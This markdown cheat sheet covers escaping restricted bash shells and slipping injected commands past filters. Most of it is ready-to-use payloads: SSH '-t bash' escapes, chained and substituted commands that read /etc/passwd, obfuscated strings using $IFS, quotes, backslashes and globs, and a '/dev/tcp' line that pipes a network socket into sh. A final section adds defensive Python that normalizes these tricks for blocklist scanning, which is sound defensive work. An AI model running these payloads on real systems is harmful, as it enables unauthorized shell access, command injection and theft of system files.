# Restricted shells

## Example for restricted shell

```
root@Desktop: ~ #ssh -6 user@fe80::XXXXX:2c74%wlan0 
user@fe80::XXXXX:2c74%wlan0 's password: 
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.15.0-34-generic x86_64) 
Documentation:  https://help.ubuntu.com 
Management:     https://landscape.canonical.com 
Support:        https://ubuntu.com/advantage 
Last login: Fri Jul 12 14:15:45 2019 from fe80::XXXXX:2c74%wlan0  
jail@HOST:~$ -rbash: /dev/null: restricted: cannot redirect output 
bash: _upvars: -a0': invalid number specifier  
-rbash: /dev/null: restricted: cannot redirect output  
bash: _upvars: -a0': invalid number specifier 
-rbash: /dev/null: restricted: cannot redirect output 
bash: _upvars: -a0': invalid number specifier  
-rbash: /dev/null: restricted: cannot redirect output  
bash: _upvars: -a0': invalid number specifier 
     
user@HOST:~$ vim 
-rbash: /usr/lib/command-not-found: restricted: cannot specify /' in command names  
jail@HOST:~$ exit 
logout  
-rbash: /usr/bin/clear_console: restricted: cannot specify /' in command names 
Connection to fe80::XXXXX:2c74%wlan0  closed. 
 
```

First:

1. Check `echo $PATH`
2. Run `ls -l` on the directory in `$PATH` to see which commands are available (e.g. `ls -l /home/student/.bin`)
3. Fix the path: `export PATH=/bin:/usr/bin`

**Enumerating the Linux environment is the most important part.** We need to enumerate the environment to find out what we can use to bypass rbash.

We need to enumerate:

1. First, check which commands are available (cd, ls, echo, etc.).
2. Check which operators are allowed (`>`, `>>`, `<`, `|`).
3. Check which programming languages are installed (perl, ruby, python, etc.).
4. Check which commands we can run as root (`sudo -l`).
5. Check for files or commands with the SUID bit set.
6. Check which shell you are in: `echo $SHELL` (in 90% of cases it will be rbash).
7. Check the environment variables: run `env` or `printenv`.

Now let's move on to common exploitation techniques.

### Practice

Practice restricted shell escape: <https://www.root-me.org/en/Challenges/App-Script/Bash-Restricted-shells>

## SSH

`ssh user@192.168.0.53 -t bash`

Or

`ssh user@192.168.0.53 -t /bin/bash`

Or

`ssh user@192.168.0.53 -t "bash --noprofile"`

## Add Path

`export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin`

## Chaining commands

```
original_cmd_by_server; ls
original_cmd_by_server && ls
original_cmd_by_server | ls
original_cmd_by_server || ls    # only runs if the first command fails
```

## Inside a command

```
original_cmd_by_server `cat /etc/passwd` 
original_cmd_by_server $(cat /etc/passwd)
```

## Filter Bypasses

### Bypass without space

Works on Linux only.

`cat</etc/passwd`

`{cat,/etc/passwd}`

`cat$IFS/etc/passwd`

`echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd`

`X=$'uname\x20-a'&&$X`

`sh</dev/tcp/127.0.0.1/4242`

### Command execution without spaces, $ or { } (Linux, Bash only)

`` IFS=,;`cat<<<uname,-a` ``

Windows only (cmd.exe substring expansion of an environment variable yields the space character):

`ping%CommonProgramFiles:~10,-18%IP`

`ping%PROGRAMFILES:~10,-5%IP`

### Bypass with a line return

`something%0Acat%20/etc/passwd`

### Bypass Blacklisted words

**Bypass with single quote**

`w'h'o'am'i`

**Bypass with double quote**

`w"h"o"am"i`

**Bypass with backslash and slash**

`w\ho\am\i`

`/\b\i\n/////s\h`

**Bypass with $@**

`who$@ami`

**Bypass with $0**

```
echo $0
-> /usr/bin/zsh
echo whoami|$0
```

**Bypass with variable expansion**

`/???/??t /???/p??s??`

```
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
```

**Bypass with wildcards**

`powershell C:\*\*2\n??e*d.*? # notepad`

`@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc`
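The quote, backslash, `$@`, `$IFS` and brace tricks above all target naive word blocklists. The Python normalizer below is an added example (not from this page) of what a defender can run over logged command strings: it undoes the listed obfuscations before matching, and its constructed sample batch also shows that the glob variants (`/???/??t`) survive normalization, which is why an allowlist of permitted commands, not a blocklist, is the sound control.

```python
import re

# Constructed sample command strings modelled on the bypasses listed on this page.
SAMPLE_COMMANDS = [
    "w'h'o'am'i",                     # single quotes
    'w"h"o"am"i',                     # double quotes
    "w\\ho\\am\\i",                   # backslashes
    "who$@ami",                       # $@ expands to nothing
    "cat${IFS}/etc/passwd",           # $IFS used as a space
    "{cat,/etc/passwd}",              # brace expansion
    "/\\b\\i\\n/////s\\h",            # backslashes plus repeated slashes
    "something%0Acat%20/etc/passwd",  # URL-encoded newline and space
    "/???/??t /???/p??s??",           # globs: need the filesystem to resolve
    "ls -l",                          # benign
]

# Words a naive filter might block (constructed for this demo).
BLOCKLIST = ("whoami", "cat /etc/passwd", "/bin/sh")


def normalize(cmd: str) -> str:
    """Undo the shell obfuscations a plain substring blocklist would miss."""
    s = cmd.replace("%0A", "\n").replace("%20", " ")   # URL encoding
    s = s.replace("${IFS}", " ").replace("$IFS", " ")  # IFS as whitespace (before brace handling)
    s = s.replace("$@", "")                            # empty with no positional args
    s = re.sub(r"\{([^{}]*)\}",                        # {a,b} -> "a b"
               lambda m: " ".join(m.group(1).split(",")), s)
    s = re.sub(r"\\(.)", r"\1", s)                     # drop escaping backslashes
    s = s.replace("'", "").replace('"', "")            # quotes that split a word
    return re.sub(r"/{2,}", "/", s)                    # collapse repeated slashes


def blocklist_hit(cmd: str, normalized: bool = True):
    """Return the first blocklisted word found in cmd, or None."""
    s = normalize(cmd) if normalized else cmd
    return next((w for w in BLOCKLIST if w in s), None)


def scan(commands):
    """Count hits without and with normalization over a batch of commands."""
    naive = sum(1 for c in commands if blocklist_hit(c, normalized=False))
    norm = sum(1 for c in commands if blocklist_hit(c))
    return naive, norm


if __name__ == "__main__":
    for c in SAMPLE_COMMANDS:
        print(f"{c!r:34} -> {normalize(c)!r:28} hit={blocklist_hit(c)}")
    print("naive/normalized hits:", scan(SAMPLE_COMMANDS))
```

On the sample batch the raw blocklist catches nothing, the normalized one catches the eight textual obfuscations and still misses the glob form.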
